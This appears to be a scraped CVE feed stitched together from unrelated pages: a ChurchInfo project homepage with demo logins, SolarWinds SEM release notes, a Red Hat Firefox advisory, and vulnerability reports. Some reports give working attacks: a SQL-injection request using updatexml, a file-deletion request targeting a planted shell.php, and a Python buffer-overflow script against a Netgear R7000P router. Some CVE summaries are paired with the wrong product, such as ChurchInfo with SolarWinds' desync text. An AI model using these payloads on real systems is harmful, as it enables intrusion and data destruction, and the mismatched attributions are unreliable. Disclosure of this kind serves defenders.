CartView.php in ChurchInfo 1.3.0 allows attackers to achieve remote code execution through insecure uploads. This requires authenticated access tot he ChurchInfo application. Once authenticated, a user can add names to their cart, and compose an email. Uploading an attachment for the email stores the attachment on the site in the /tmp_attach/ folder where it can be accessed with a GET request. There are no limitations on files that can be attached, allowing for malicious PHP code to be uploaded and interpreted by the server.

**Looking for a Flagship Church**

The ChurchInfo team is looking for a flagship church to serve as a focal point for for the development team.  We know that many churches are using our software, and we want to cultivate a special relationship with at least one and possibly several churches to challenge and inspire us.

We can offer the following:

\- Free hosting on churchinfoservices.com, or support on the hosting service of your choice

\- Priority access to support from the development team

\- Priority consideration for the development of new features that are of special interest to your church

In return, we request the following:

\- Use all the features of ChurchInfo that make sense for your church.  ChurchInfo is designed to serve as your only membership database so you only need to maintain membership information in one place.

\- Tell us about any difficulties you have or suggestions for improvement.

The most satisfying thing about supporting the ChurchInfo open source project is knowing that churches can rely on this open-source alternative to expensive church management systems.  If you are looking for a new database solution, or perhaps your first database solution, press the "Contact Us" link toward the upper-right part of this page to inquire.

**Inexpensive Hosting Service Now Available**

After more than twelve years as a purely volunteer venture ChurchInfo has teamed up with a small company called ChurchInfo Services to provide hosting service and automated installation.  This service is designed to be an inexpensive option for churches that don't have access to the necessary technical skills to build and maintain their own installations.  There is no change to the core mission and values of the ChurchInfo project.  The goal is to expand the availability of ChurchInfo to more churches, especially those which found the initial installation to be too much of a hurdle.

Here is a link to the ChurchInfo Services web site.

**Upgrading ChurchInfo**

All versions of ChurchInfo since 1.2.7 are designed to upgrade the database automatically.  Here are the steps to complete the upgrade process:

*   Back up your database using phpMyAdmin.  Select your ChurchInfo database from the list to the left, then select the export tab across the top to the right.  The default export options should be fine and it should give you a copy of your entire database in a ".sql" file.
*   Make a copy of your old file Include/Config.php.  This file contains the database configuration settings near the beginning of the file.
*   If you have been uploading images make a copy of your Images directory with the sub-directories Person, Person/thumbnails, Family, and Family/thumbnails.
*   Extract the ChurchInfo distribution from the .tar.gz file of the .zip file.
*   Copy the new files over your previous installation, making sure they wind up in the same place.  FileZilla is good about doing this recursive upload copy if you need to use FTP.
*   Transfer the database settings from your saved copy of Include/Config.php to the new installation.
*   Log in as usual.  The first thing it will do is upgrade the database, then the new version will be operational.

If you prefer, you can rename your installation directory to set it aside and then install the ChurchInfo distribution into the original installation directory.  If you install this way you will need to copy any image files from the renamed installation directory to the same spot in the new installation.

**Release 1.3.0 Available Now****Major new feature: Self-Service Interface**

The self-service interface allows members to maintain their own personal  
information, enter pledges and electronic payment methods, and make immediate  
or scheduled electronic donations.  This interface is designed to be easily  
embedded in a church web site or it can run stand-alone.  The starting point  
for the self-service interface is SelfRegisterHome.php.

**Support for newer versions of PHP and MySQL (now MariaDB)**

The developers of PHP have obsoleted the mysql library that was used in  
previous versions of ChurchInfo.  This release uses the newest library for  
compatibility with PHP 7.  Many of the developers of MySQL have moved to  
a new purely open-source database called MariaDB which is based on MySQL and  
fully compatibly with ChurchInfo.  Several of the query constructs used in  
previous versions of ChurchInfo are now unsupported and have been updated  
in this release.

**Electronic donations through Vanco**

The new self-service interface supports electronic donations through Vanco  
only.  There will probably be another release soon to support Authorize.NET  
and perhaps Moneris if there is interest.

**Numerous bug fixes and minor improvements**

There are numerous bug fixes and minor improvements in this release.  Details  
are in the Git repository "CodeGit" on SourceForge.

**Moving ChurchInfo**

I often get this question- "How can I move ChurchInfo from one server to another?"  Fortunately, the process for moving ChurchInfo is pretty easy:

\- Use phpMyAdmin to back up the entire database to a sql file  
\- Copy the entire file structure under the churchinfo directory to the new server  
\- Use phpMyAdmin on the destination to create the ChurchInfo database, populate it using the back-up file rather than running SQL/Install.sql  
\- Edit the file Include/Config.php on the destination to establish the database connection on the new server  
\- Log into ChurchInfo on the new server

The only tricky step is editing Include/Config.php.  Hosting services tend to have different and incompatible rules about how databases and database users are named, and the database host may be different from "localhost".

This process transfers everything so all the same logins will still work on the new server.

The nature of the servers does not matter as long as Include/Config.php contains the necessary database connection information.  For my own church I frequently bring the database back to a PC running xampp to try things that I would not try on the active server.

**Read Before Downloading**

ChurchInfo is a web server application, which is nice because you can use it from anywhere with a browser but it isn't your typical download/install application.  If you just want to run stand-alone on a PC please read the article below "Simple Installation on Windows".  You can get the server infrastructure from xampp and then browse to localhost.  The general instructions for installing on any server are in the distribution file Documentation/Readme.txt.  There is a shared demo running on our web site; see article below "Try our demo".  You can also register for a private demo that will run for a few weeks.  See the article below "Private Demos Now Available".  Your experience running a demo on our web site will be exactly the same as running your own installation.  If you have any trouble with the shared demo, or a private demo, please use the "Contact Us" link above and tell us what happened.  We can normally fix issues with the demos the same day.

If you want to use a commercial server please do not use GoDaddy.  Their servers seem to be overwhelmed and trying to use the admin interface is terribly frustrating.

**Demonstration Videos****Introduction Video**

This is a very quick demonstration video showing operation of our demo installation.  You can use the demo any time starting from the link near the bottom of this page.  If the shared demo gets too messed up please send me a message and I will reset it.

Watch introduction

**Self-Service Features Video**

This video uses the nightly build demonstration to show off the new self-services feature in release 1.3.0.  The nightly build is reset every night so it is a good place to do experiments starting from a fresh installation.

Watch self-service

**Financial Features Video**

A lot of people have been watching the quick introduction video so I decided to make another one focusing on the deposit slip.  I get a lot of questions about the financial features of ChurchInfo and this video answers many of the most common questions.  If you would like to see more videos for other subjects please use the contact link to send me email.

Watch financial features  

**Installation Demonstration**

This new video shows the latest version of ChurchInfo being installed on a free server service.

Watch Installation on Free Server

These two videos take you through the entire process of installing on a commercial server.  These videos are older and the server services have improved since the videos were made.  The free server installation above is more representative of modern server services.

Watch installation

Watch test and debug

**Auction Automation**

This video is about using the ChurchInfo FundRaiser feature to facilitate an auction event.

Watch Auction

**Private Demos Now Available**

We can now host private demo installations to facilitate your evaluation process.  These demo installations are created in randomly named directories.  The purpose of these private demos is to give you a chance to experiment in your own space.  You can enter a little data, show your minister and your treasurer how it works, without having to worry about someone changing the admin password or deleting half the menu options.  Your demo space will be private but not particularly secure or permanent.  Please don't put a lot of work into it as it will be deleted in about a week unless you ask for more time.  Assuming your evaluation goes well please plan to download and install in your own world as soon as possible.

Please don't put nonsense for contact information.  Your contact information will only be used to communicate about ChurchInfo and will not be shared or sold for any other purpose.  If you put nonsense in the Private Demo Form your demo will probably be recycled soon and you will get Error 404 page not found while trying to use your private demo.

To get started with your private demo use this link: Private Demo Form

If you have any trouble with the private demo please use the "Contact us" link at the top of the page and tell us what happened.  We should be able to fix it for you.

**To our international users**

You can set the language by changing sLanguage in Admin->Edit General Settings.  ChurchInfo currently supports the following settings: de\_DE (German), en\_AU (Australian English), fr\_FR (French, not updated recently), it\_IT (Italian, not updated recently), nl\_NL (Dutch), pt\_BR (Brazilian Portuguese), sv\_SE (Swedish).  If you would like to develop a new translation please let me know!

**Try our Demo**

We have a demo installation of the latest version 1.3.0 available here The self-service interface for this demo installation is here.

Feel free to play with this database to see if ChurchInfo will work for your church. The password for this demo database is: “demoadmin” for Admin.  See the links below if you find a bug or want to discuss an issue.

**Help Test The Very Latest from the Development Team**

There is an automatically updated installation directly from our Git source control server here.  Please play with this version and report any issues in the bug trackers.  Log in with user name admin, password demoadmin.  No other logins are configured automatically.  If you prefer to take the very latest to your own playground this installation archive .tar.gz file is updated nightly: churchinfo-latest.tar.gz.

**Simple Installation on Windows**

I often get request from people who want to quickly install ChurchInfo on a computer running Windows.  This is a great way to get started and experiment, although the real power of ChurchInfo is best appreciated when it is running on a server and accessed from multiple different computers.  I use this procedure to install ChurchInfo for experimenting or development on a Windows laptop.

I have had good luck hopping back and forth between this stand-alone installation as a real server, simply using phpMyAdmin to back up and restore the database.

Here are the step-by-step instructions:

Install xampp for Windows.  This provides Apache, PHP and MySQL.  I tell it to run Apache and MySQL as services.

Unpack the churchinfo directory from the distribution into the directory C:\\xampp\\htdocs\\churchinfo  
Use Firefox or Chrome to browse to: http://localhost  
Click the phpMyAdmin link  
Select the Privileges tab  
Press Add a new user

Set User name to "churchinfo", Host to "localhost", Password to "churchinfo", Re-type to "churchinfo", enable "create database and assign all priviledges; them press Go (bottom-right)  
Select the new churchinfo database from the link to the left  
Select the Import tab  
Press Browse...  
Navigate to C:\\xampp\\htdocs\\churchinfo\\SQL\\Install.sql and choose this file  
Press the Go button  
Now browse to: http://localhost/churchinfo  
Log in with user name "admin", password "churchinfoadmin"  
It will ask you to change the password immediately.

CVE-2021-43258: ChurchInfo open source church database created with PHP & MySQL! - ChurchInfo open source church database created with PHP & MySQL!

This vulnerability occurs when a web server fails to correctly process the Content-Length of POST requests. This can lead to HTTP request smuggling or XSS.

Release Date: November 22, 2022

This document summarizes new features, improvements, and fixed issues in Security Event Manager (SEM) 2022.4, additional features, and upgrade notes and workarounds for known issues.

**New in SEM 2022.4****Added features and improvements**

*   **Import and Export of Rules**
    
    Administrators can export rules from SEM to a JSON file, and all users can import rules on the Configure > Rules page.
    
*   **Export nodes**
    
    All or selected node information can be exported as a CSV file on the Configure > Nodes page.
    
*   **Improved Saved and Schedule Query options**
    
    The Save and Schedule options are now consolidated under one menu.
    
*   **Query Tags and Thresholds**
    
    SEM 2022.4 introduces query tags and thresholds. These are used to group queries and determine the severity level and colors for two new dashboard widgets: Scheduled query severity, and Scheduled query table severity.
    
    To set the tags and thresholds for a query:
    
    1.  Select the required query in the left column of Historical Events.
    2.  Click Option and select Edit saved query.
    3.  Click Add tag. Queries can be assigned one or more tags.
    4.  Select the Thresholds tab. At least one tags must be added before you can set thresholds.
    5.  Set the number of results per evaluation you want to indicate warning and critical severity.
    
    For more information about tags, thresholds and the scheduled event severity dashboard widgets, see Historical Events section of the SEM 2022.4 Administrator Guide.
    

*   **HTTPS is permanently enabled**
    
    The togglehttp command has been removed from the CMC manager options. If HTTP has been enabled prior to upgrading to 2022.4 it will be disabled.
    
*   **Improved Remote Agent Installer credentials dialog**

For system requirements, see SEM 2022.4 System Requirements.

If you are looking for previous release notes for SEM, see Previous Version documentation.

**New customer installation**

For information about installing SEM, see the SEM Installation Guide and the SEM Getting Started Guide.

SolarWinds advises that, as a best practice, the SEM appliance should not be set up to be available to the Internet or any public-facing network. In addition, using this practice will help prevent access by unauthorized users. For further information on SEM security, see the SEM security checklists.

**Before you upgrade****Migrate LDAP connectors (introduced in SEM 2020.4)**

It is recommended that users remove any ambiguity in their Directory Service Tool connector configurations to allow migration to run as smoothly as possible. This can be by ensuring only one Directory Service Tool connector configuration is set up per domain.

All Directory Service Tool connectors are removed in process of the migration.

**Upgrade agents**

For AIX, HPUX and Solaris, agents installers now only contain custom Java; this means customers need to install Java themselves as a prerequisite.

1.  Upgrade Java installation to the latest version. See System Requirements for supported versions.
    
    For AIX agents, see Known Issues - AIX agent not connected after SEM upgrade.
    
2.  Upgrade SEM agents using latest custom Java installer.

**Upgrade Manager appliance**

For Windows systems, upgrade the Manager appliance with OpenJDK 17.0.3 or later.

**How to upgrade**

If you are upgrading from a previous version, use the following resources to plan and implement your upgrade.

SEM  must be upgraded to 2020.2 or 2020.2.1 before upgrading to 2022.4. To upgrade from earlier versions, see the SEM Upgrade Path to help you plan and execute your upgrade.

Download the upgrade package from the SolarWinds Customer Portal.

**CMC**

Since SEM 2020.4, a password is required to access the CMC command-line interface. The default CMC password is password. See Change the SEM CMC password for instructions on changing this.

**File system consistency check (fsck)**

During your upgrade, the system may run a fsck check during reboot. This can last 30 or more minutes depending on the quantity of data in the data partition. With the Debian version upgrade, the file system is configured to initiate the check when certain conditions are met:

*   21 mounts since the last check (during the 22nd reboot)

Or:

*   Six months since the last check

**Supported connectors**

The list of currently supported connectors can be found here.

**Fixed issues**

SEM 2022.4 fixes the following issues:

 

Case Number

Description

01119251

Remote agent installation does not display credentials.

01087657, 01077235, 01098824

OpenJDK issue resolved.

01066283, 0106346

Windows agent issue after update resolved.

00686391, 00976672, 0721268

Issue fixed where agent was not sending logs.

00997061, 00815612, 00929072, 00667624, 00823710, 01083879

Issue where alert fired multiple times in specified timeframe instead of once resolved

**SolarWinds CVEs**

    

CVE-ID

Vulnerability Title

Description

Severity

Credit

CVE-2022-38113

Information Disclosure Vulnerability

This vulnerability discloses build and services versions in the server response header.

Low

 

CVE-2022-38114

Client Side Desync Vulnerability

This vulnerability occurs when a web server fails to correctly process the Content-Length of POST requests. This can lead to HTTP request smuggling or XSS.

Low

Ken Pyle CYBIR

CVE-2022-38115

Insecure Methods Vulnerability

Insecure method vulnerability in which , allowed HTTP methods are disclosed e.g., OPTIONS, DELETE, TRACE, and PUT

Low

 

SolarWinds would like to thank our Security Researchers for reporting on these issuse in a responsible manner and working with our security, product, and engineering teams to fix the vulnerabilities.

**Third Party CVEs**

   

CVE-ID

Vulnerability Title

Description

Severity

CVE-2009-2409

SHA-1 Collision Vulnerability

The Network Security Services (NSS) library before 3.12.3, as used in Firefox; GnuTLS before 2.6.4 and 2.7.4; OpenSSL 0.9.8 through 0.9.8k; and other products support MD2 with X.509 certificates, which might allow remote attackers to spoof certificates by using MD2 design flaws to generate a hash collision in less than brute-force time.

The scope of this issue is currently limited because the amount of computation required is still large.

Medium

**Known issues**

In SEM Reports, problems occur setting schedule times in Spanish format

**Issue:** When the Spanish format has been selected in SEM Reports, user is unable to specify whether schedule times are AM or PM.

**Resolution/Workaround:** Set Format to English (World) when specifying schedule times.

USB Defender service stops working after local policy USB detached

**Issue:** When USB Defender with Local policy is set up. A USB device that is not on Local policy whitelist is inserted and successfully disconnect by USB Defender. However, when reinserted and successfully ejected once or more than ten times the service fails.

**Resolution/Workaround:** None.

\[Rules builder\] \[Email templates\] - Not possible to select Event Data in Email action for rule with single condition and occurrence settings

**Issue:** After selecting Send Email Message in a single condition event rule, and selecting an email template, you cannot select Event Data as value for the parameter.

**Resolution/Workaround:** The rule must be triggered by one event only.

*   **Unable to install MacOS agent on BigSur**

**Issue:** Unable to install the MacOS agent on BigSur.

**Resolution/Workaround:** Execute/start the customJava installer, kill it, and then execute the agent installer with bundled java.

*   **"Set time when a rule won't trigger actions after rule was true" not working**

**Issue:** "Set time when a rule won't trigger actions after rule was true" functionality in rules does not work.

**Resolution/Workaround:** None.

   

Version

EOL

Announcements

EOE Effective

dates

EOL Effective dates

6.7

**May 18, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 6.7, 6.7.1, and 6.7.2 should begin transitioning to the latest version of SEM.

**August 18, 2021:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 6.7, 6.7.1, and 6.7.2 will no longer be actively supported by SolarWinds.

**August 18, 2022:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 6.7, 6.7.1, and 6.7.2.

2019.4

**April 19, 2022:** End-of-Life (EoL) announcement – Customers on SEM versions 2019.4, and 2019.4.1 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2019.4, and 2019.4.1 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2019.4, and 2019.4.1.

2020.2

**April 19, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 2020.2, 2020.2.1 and 2020.2.2 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2020.2, 2020.2.1 and 2020.2.2 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2020.2, 2020.2.1 and 2020.2.2.

2020.4

**April 19, 2021:** End-of-Life (EoL) announcement – Customers on SEM versions 2020.4, and 2020.4.1 should begin transitioning to the latest version of SEM.

**October 19, 2022:** End-of-Engineering (EoE) – Service releases, bug fixes, workarounds, and service packs for SEM versions 2020.4, and 2020.4.1 will no longer be actively supported by SolarWinds.

**October 19, 2023:** End-of-Life (EoL) – SolarWinds will no longer provide technical support for SEM version versions 2020.4, and 2020.4.1.

**Legal notices**

© 2022 SolarWinds Worldwide, LLC. All rights reserved.

This document may not be reproduced by any means nor modified, decompiled, disassembled, published or distributed, in whole or in part, or translated to any electronic medium or other means without the prior written consent of SolarWinds. All right, title, and interest in and to the software, services, and documentation are and shall remain the exclusive property of SolarWinds, its affiliates, and/or its respective licensors.

SOLARWINDS DISCLAIMS ALL WARRANTIES, CONDITIONS, OR OTHER TERMS, EXPRESS OR IMPLIED, STATUTORY OR OTHERWISE, ON THE DOCUMENTATION, INCLUDING WITHOUT LIMITATION NONINFRINGEMENT, ACCURACY, COMPLETENESS, OR USEFULNESS OF ANY INFORMATION CONTAINED HEREIN. IN NO EVENT SHALL SOLARWINDS, ITS SUPPLIERS, NOR ITS LICENSORS BE LIABLE FOR ANY DAMAGES, WHETHER ARISING IN TORT, CONTRACT OR ANY OTHER LEGAL THEORY, EVEN IF SOLARWINDS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH DAMAGES.

The SolarWinds, SolarWinds & Design, Orion, and THWACK trademarks are the exclusive property of SolarWinds Worldwide, LLC or its affiliates, are registered with the U.S. Patent and Trademark Office, and may be registered or pending registration in other countries. All other SolarWinds trademarks, service marks, and logos may be common law marks or are registered or pending registration. All other trademarks mentioned herein are used for identification purposes only and are trademarks of (and may be registered trademarks) of their respective companies.

CVE-2022-38114: SEM 2022.4 Release Notes

Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=user/manage_user&id=.

Permalink

Cannot retrieve contributors at this time

**Sanitization Management System v1.0 by oretnom23 has SQL injection**

BUG\_Author: tpaer

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15770/sanitization-management-system-project-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /php-sms/admin/?page=user/manage\_user&id=

Vulnerability location: /php-sms/admin/?page=user/manage\_user&id=, id

dbname =sms\_db,length=6

\[+\] Payload: /php-sms/admin/?page=user/manage\_user&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /php\-sms/admin/?page\=user/manage\_user&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3puonr8mf2gr4m6iivf71mhjtq
Connection: close

CVE-2022-44278: bug_report/SQLi-1.md at main · Onetpaer/bug_report

Automotive Shop Management System v1.0 is vulnerable to Delete any file via /asms/classes/Master.php?f=delete_img.

**Automotive Shop Management System v1.0 by oretnom23 has Delete any file**

BUG\_Author: tpaer

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15312/automotive-shop-management-system-phpoop-free-source-code.html

Vulnerability File: /asms/classes/Master.php?f=delete\_img

Vulnerability location: /asms/classes/Master.php?f=delete\_img, path

Payload:

POST /asms/classes/Master.php?f\=delete\_img HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: application/json, text/javascript, \*/\*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.1.88/asms/admin/?page=system\_info
Content-Length: 64
Cookie: \_\_utma=78021076.1353699714.1665838696.1665838696.1665838696.1; \_\_utmz=78021076.1665838696.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); \_gauges\_unique\_month=1; \_gauges\_unique\_year=1; \_gauges\_unique=1; PHPSESSID=ocll92n082l6eedlf8jugi8i1r
Connection: close
path=C%3A%2Fxampp%2Fhtdocs%2Fasms%2Fuploads%2Fbanner%2Fshell.php

Here we delete the shel.php file in the directory

Currently, when we do not send a request to delete the shell.php file, the shell.php file is still in the directory of the website

The response package shows that the deletion was successful. Let's go to the directory to see if the shell.php file still exists. 

By this time, shell.php has been deleted.

CVE-2022-44280: bug_report/delete-1.md at main · Onetpaer/bug_report

Red Hat Security Advisory 2022-8580-01 - Mozilla Firefox is an open-source web browser, designed for standards compliance, performance, and portability. This update upgrades Firefox to version 102.5.0 ESR. Issues addressed include bypass and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: firefox security update  
Advisory ID:       RHSA-2022:8580-02  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:8580  
Issue date:        2022-11-22  
CVE Names:         CVE-2022-45403 CVE-2022-45404 CVE-2022-45405  
                   CVE-2022-45406 CVE-2022-45408 CVE-2022-45409  
                   CVE-2022-45410 CVE-2022-45411 CVE-2022-45412  
                   CVE-2022-45416 CVE-2022-45418 CVE-2022-45420  
                   CVE-2022-45421  
====================================================================  
1. Summary:

An update for firefox is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

Mozilla Firefox is an open-source web browser, designed for standards  
compliance, performance, and portability.

This update upgrades Firefox to version 102.5.0 ESR.

Security Fix(es):

* Mozilla: Service Workers might have learned size of cross-origin media  
files (CVE-2022-45403)

* Mozilla: Fullscreen notification bypass (CVE-2022-45404)

* Mozilla: Use-after-free in InputStream implementation (CVE-2022-45405)

* Mozilla: Use-after-free of a JavaScript Realm (CVE-2022-45406)

* Mozilla: Fullscreen notification bypass via windowName (CVE-2022-45408)

* Mozilla: Use-after-free in Garbage Collection (CVE-2022-45409)

* Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5  
(CVE-2022-45421)

* Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie  
policy (CVE-2022-45410)

* Mozilla: Cross-Site Tracing was possible via non-standard override  
headers (CVE-2022-45411)

* Mozilla: Symlinks may resolve to partially uninitialized buffers  
(CVE-2022-45412)

* Mozilla: Keystroke Side-Channel Leakage (CVE-2022-45416)

* Mozilla: Custom mouse cursor could have been drawn over browser UI  
(CVE-2022-45418)

* Mozilla: Iframe contents could be rendered outside the iframe  
(CVE-2022-45420)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing the update, Firefox must be restarted for the changes to  
take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2143197 - CVE-2022-45403 Mozilla: Service Workers might have learned size of cross-origin media files  
2143198 - CVE-2022-45404 Mozilla: Fullscreen notification bypass  
2143199 - CVE-2022-45405 Mozilla: Use-after-free in InputStream implementation  
2143200 - CVE-2022-45406 Mozilla: Use-after-free of a JavaScript Realm  
2143201 - CVE-2022-45408 Mozilla: Fullscreen notification bypass via windowName  
2143202 - CVE-2022-45409 Mozilla: Use-after-free in Garbage Collection  
2143203 - CVE-2022-45410 Mozilla: ServiceWorker-intercepted requests bypassed SameSite cookie policy  
2143204 - CVE-2022-45411 Mozilla: Cross-Site Tracing was possible via non-standard override headers  
2143205 - CVE-2022-45412 Mozilla: Symlinks may resolve to partially uninitialized buffers  
2143240 - CVE-2022-45416 Mozilla: Keystroke Side-Channel Leakage  
2143241 - CVE-2022-45418 Mozilla: Custom mouse cursor could have been drawn over browser UI  
2143242 - CVE-2022-45420 Mozilla: Iframe contents could be rendered outside the iframe  
2143243 - CVE-2022-45421 Mozilla: Memory safety bugs fixed in Firefox 107 and Firefox ESR 102.5

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
firefox-102.5.0-1.el9_1.src.rpm

aarch64:  
firefox-102.5.0-1.el9_1.aarch64.rpm  
firefox-debuginfo-102.5.0-1.el9_1.aarch64.rpm  
firefox-debugsource-102.5.0-1.el9_1.aarch64.rpm

ppc64le:  
firefox-102.5.0-1.el9_1.ppc64le.rpm  
firefox-debuginfo-102.5.0-1.el9_1.ppc64le.rpm  
firefox-debugsource-102.5.0-1.el9_1.ppc64le.rpm

s390x:  
firefox-102.5.0-1.el9_1.s390x.rpm  
firefox-debuginfo-102.5.0-1.el9_1.s390x.rpm  
firefox-debugsource-102.5.0-1.el9_1.s390x.rpm

x86_64:  
firefox-102.5.0-1.el9_1.x86_64.rpm  
firefox-debuginfo-102.5.0-1.el9_1.x86_64.rpm  
firefox-debugsource-102.5.0-1.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-45403  
https://access.redhat.com/security/cve/CVE-2022-45404  
https://access.redhat.com/security/cve/CVE-2022-45405  
https://access.redhat.com/security/cve/CVE-2022-45406  
https://access.redhat.com/security/cve/CVE-2022-45408  
https://access.redhat.com/security/cve/CVE-2022-45409  
https://access.redhat.com/security/cve/CVE-2022-45410  
https://access.redhat.com/security/cve/CVE-2022-45411  
https://access.redhat.com/security/cve/CVE-2022-45412  
https://access.redhat.com/security/cve/CVE-2022-45416  
https://access.redhat.com/security/cve/CVE-2022-45418  
https://access.redhat.com/security/cve/CVE-2022-45420  
https://access.redhat.com/security/cve/CVE-2022-45421  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY30bJNzjgjWX9erEAQjMNg/+LNWOOp0chbfCOhhzud7rJUwhYExagD6i  
KtRJCOwVZ50PAcqZ3DD9s53GNTOifh5S2jt+I71o7Aw4SM2oZW6xhsQvYAcxQy6s  
KIbhxwflouzjsQfOPhFoz8NVp8Ky5cY4cESwmvFUEMZIbTlaUZvoD+fDnDT/USVJ  
8kmeyeyEHtKhiuV+vzmMIg7bDbmElFj0nSo5T2LxNCuy12M3dYM9CfXAjea+C4lu  
IgwnNx/AyhUvJgr4DkSNFGzKbKsH0WQ5PAHndftbDIVYnAYzpEwmx1mvYAcP5+C5  
dfESQO0VSf90ibIbmHvl5MuUwrN6N9/OC0do6TO2LnnELOqO8OhSa+TYCCVtZ5kc  
NBDfWUCbdG9w1niuR9XwTLS/agAsc8uD293aPi1mOJd/5nQtHlBvnv9CIjCxB/X1  
SnzhwS8TeuBvm4x9ZlQJJL/IAfC+joVX4q4Hc6qVdkuYMvo94n5UkSrcve7JHuSD  
66hFa4LJslEG/U79gTQBNYCen9ux6UDQ9VZ9DzP0GfHSAowFMKIj90Jrko2skSuM  
+exfsYEZ7wVvyyPZnY5/KPn+mgMgkXq8ATsk99meWr+fVLfoabstt1v3vsnz+zgY  
nthxvl5TCj26uudlbbKHR+26KPXVEbROLa4OQ6LghBbleIuhnSp5+tuDqSG2JxVJ  
hB/k4b3CqhA=5TAs  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-8580-01

Netgear R7000P V1.3.1.64 is vulnerable to Buffer Overflow via parameter enable_band_steering.

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_5835C function, which can be accessed via the URL http://routerlogin.net/WLG_wireless_dual_band_r10.htm.

Parameter enable_band_steering, is controllable and will be formatted by printf for the print output. . Users can control formatting instructions, and attackers can use this capability to expose or overwrite memory values and compromise program security.

import socket
import os

li \= lambda x : print('\\x1b\[01;38;5;214m' + x + '\\x1b\[0m')
ll \= lambda x : print('\\x1b\[01;38;5;1m' + x + '\\x1b\[0m')

ip \= '192.168.0.1'
port \= 80
r \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
r.connect((ip, port))
rn \= b'\\r\\n'
p1 \= b'a' \* 0x3000
p2 \= b'enable\_band\_steering=' + p1 \# payload
p3 \= b"POST /WLG\_wireless\_dual\_band\_r10.html" + b" HTTP/1.1" + rn
p3 += b"Host: 192.168.0.1" + rn
p3 += b"User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0" + rn
p3 += b"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,\*/\*;q=0.8" + rn
p3 += b"Accept-Language: en-US,en;q=0.5" + rn
p3 += b"Accept-Encoding: gzip, deflate" + rn
p3 += b"Cookie: password=1111" + rn
p3 += b"Connection: close" + rn
p3 += b"Upgrade-Insecure-Requests: 1" + rn
p3 += (b"Content-Length: %d" % len(p2)) +rn
p3 += b'Content-Type: application/x-www-form-urlencoded'+rn
p3 += rn
p3 += p2

r.send(p3)

response \= r.recv(4096)
response \= response.decode()
li(response)

CVE-2022-44190: IoT_vuln/Netgear/R7000P/6 at main · RobinWang825/IoT_vuln

Netgear R7000P V1.3.1.64 is vulnerable to Buffer Overflow via parameters KEY1 and KEY2.

The stack overfow vulnerability is in /usr/sbin/httpd. The vulnerability occurrs in the sub_5835C function, which can be accessed via the URL http://routerlogin.net/WLG_wireless_dual_band_r10.htm.

